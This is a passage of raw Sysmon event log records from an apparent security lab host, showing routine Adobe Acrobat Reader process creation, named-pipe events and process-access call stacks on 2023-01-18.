DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 18141800x800000000000000046920Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:10.804{FE4C2B44-E650-63C7-8906-00000000AF02}3796\com.adobe.reader.rna.578C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 18141800x800000000000000046919Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:10.803{FE4C2B44-E64A-63C7-8706-00000000AF02}1400\com.adobe.reader.rna.administrator.DC.0C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 10341000x800000000000000046918Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.760{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046917Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.760{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046916Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.760{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046915Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.760{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000046914Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:10.760{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.4143645655129831365C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000046913Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:10.760{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.4143645655129831365C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000046912Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.760{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000046911Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.760{FE4C2B44-E650-63C7-8906-00000000AF02}37963120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9888(wow64)|C:\Windows\System32\KERNELBASE.dll+157bad(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe+1136f|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe+2465|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+32aa1bc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+f3c9d6(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+17a4c0e(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+13618b7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d01d85(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c56e7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c53b6(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c50f1(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+5794b9d(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+57948e5(wow64) 154100x800000000000000046910Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.769{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe22.3.20310.0Adobe RdrCEFAdobe AcroCEFAdobe Systems IncorporatedAcroCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/22.3.20310 Chrome/105.0.0.0" --first-renderer-process --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\debug.log" --touch-events=enabled --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --launch-time-ticks=3170189309 --mojo-platform-channel-handle=1984 --field-trial-handle=1448,i,5134491287969886603,3611864682310924974,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1C:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=387770AB000A15CC3D30E0594F2AFC02,SHA256=AD06655370603DD0F76F2E7824F749DA4B753EF57ECAE93B9A24B5EB7F5EC27A,IMPHASH=6B10CB5D44CC40175E3AB76C7CC1D2A0{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe" --backgroundcolor=16514043 10341000x800000000000000046909Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.760{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046908Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.760{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046907Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.760{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046906Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.760{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000046905Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:10.760{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.16642163514855080185C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000046904Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:10.760{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.16642163514855080185C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000046903Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.760{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046902Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.760{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046901Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.760{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000046900Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.760{FE4C2B44-E650-63C7-8906-00000000AF02}37963120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9888(wow64)|C:\Windows\System32\KERNELBASE.dll+d856c(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d330b7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d328ca(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+32aa882(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+32aa0c9(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+f3c9d6(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+17a4c0e(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+13618b7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d01d85(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c56e7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c53b6(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c50f1(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+5794b9d(wow64) 154100x800000000000000046899Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.763{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe22.3.20310.0Adobe RdrCEFAdobe AcroCEFAdobe Systems IncorporatedAcroCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/22.3.20310 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\debug.log" --mojo-platform-channel-handle=1916 --field-trial-handle=1448,i,5134491287969886603,3611864682310924974,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8C:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=387770AB000A15CC3D30E0594F2AFC02,SHA256=AD06655370603DD0F76F2E7824F749DA4B753EF57ECAE93B9A24B5EB7F5EC27A,IMPHASH=6B10CB5D44CC40175E3AB76C7CC1D2A0{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe" --backgroundcolor=16514043 10341000x800000000000000046898Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.760{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000046897Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:10.760{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.8407124678609437081C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000046896Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:10.760{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.8407124678609437081C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000046895Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.744{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046894Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.744{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046893Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.744{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046892Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 